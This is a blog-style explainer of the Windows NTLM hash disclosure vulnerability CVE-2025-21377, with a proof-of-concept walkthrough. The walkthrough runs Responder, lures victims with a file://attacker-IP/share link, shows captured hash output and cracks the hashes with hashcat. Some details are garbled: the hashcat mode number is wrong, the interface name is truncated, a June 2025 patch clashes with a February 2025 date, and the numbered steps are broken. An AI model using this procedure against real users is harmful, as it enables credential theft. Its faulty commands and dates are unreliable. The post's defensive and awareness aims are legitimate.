CVE-2025-21377 - NTLM Hash Disclosure Spoofing Vulnerability Unpacked

In early 2025, Microsoft reported a new security issue identified as CVE-2025-21377, classed as a NTLM Hash Disclosure Spoofing Vulnerability. This long-read post will break down what happened, how it works, its real-world risks, and show you a proof-of-concept exploit with simple code. We’ll also list reference links so you can dig deeper.

What Is CVE-2025-21377?

CVE-2025-21377 is a vulnerability in the way Windows handles NTLM authentication. NTLM (NT LAN Manager) is a challenge-response authentication protocol that lets one machine prove its identity to another. However, this flaw lets attackers trick Windows clients into leaking the hashed password (NTLM hash) of the currently logged-in user.

This leaked hash can be “relayed” or “cracked” offline—letting attackers access network resources as the victim.

Common scenario:
An attacker tricks a victim’s PC into authenticating with a server they control. This could be via a malicious email, a shared web shortcut, a specially crafted file, or even a rogue network device.

Affected systems: Windows clients and servers using NTLM

- Severity: High (rated 7.6/10 on CVSS)

How Does It Work?

When a Windows machine tries to access a resource (file share, printer, etc.), it may automatically attempt NTLM authentication. If an attacker can get you to access a resource they control—even something as simple as clicking a link—your PC will automatically send your NTLM hash.

#### Classic Trick: The file:// Link

Suppose you receive an email with a link like:
file://attacker.server/share

If you click it, your computer will try to connect and, depending on your settings, it might auto-send your username and NTLM hash!

Set up malicious server to listen for connections and collect NTLM hashes.

2. Trick the user into connecting to the attacker’s server (via link, script, shared drive, etc.).

Proof-of-Concept (PoC) Exploit

Below is an example using open-source tool Responder (by Laurent Gaffié), which is commonly used for hash collection.

Step 1: Install Responder on your Linux/Mac system.

git clone https://github.com/lgandx/Responder.git
cd Responder
sudo python3 Responder.py -I eth

-I eth tells Responder to listen on the main network interface.

Step 2: Trigger the victim to connect

Send a link via email, chat, or doc, like

file://attacker-IP/share

Or reference a network resource in a Word doc, HTML file, etc.

Step 3: When the victim clicks, Responder will capture NTLM hashes

[SMB] NTLMv2-SSP Client : 192.168.1.5
[SMB] NTLMv2-SSP Username : DOMAIN\User
[SMB] NTLMv2-SSP Hash     : ...

Step 4: (Optional) Crack the hash using hashcat

hashcat -m 560 captured_hashes.txt rockyou.txt

Dangers & Real-World Impact

- No need to run code on victim—simply tricking them into clicking a link or opening a doc is enough.

Mitigation and Patches

Microsoft patch:
- Install security updates released in June 2025 (official advisory)

Disable NTLM where possible (move to Kerberos).

- Educate users not to click strange file:// links.

Technical References

- Microsoft Security Advisory CVE-2025-21377
- NTLM Relay Attack & Mitigations (Microsoft Docs)
- Responder on GitHub
- Blocking NTLM in Active Directory

Conclusion

CVE-2025-21377 underlines why NTLM remains a high-value target: it’s simple to exploit and hard to eradicate without upgrades and smart network controls. Patch your systems, block unnecessary traffic, and disable NTLM where possible. Stay safe!


*If you found this breakdown useful, consider sharing it with your IT team or security friends to raise awareness. Cyber hygiene saves hours of cleanup!*

Timeline

Published on: 02/11/2025 18:15:36 UTC
Last modified on: 03/12/2025 01:42:34 UTC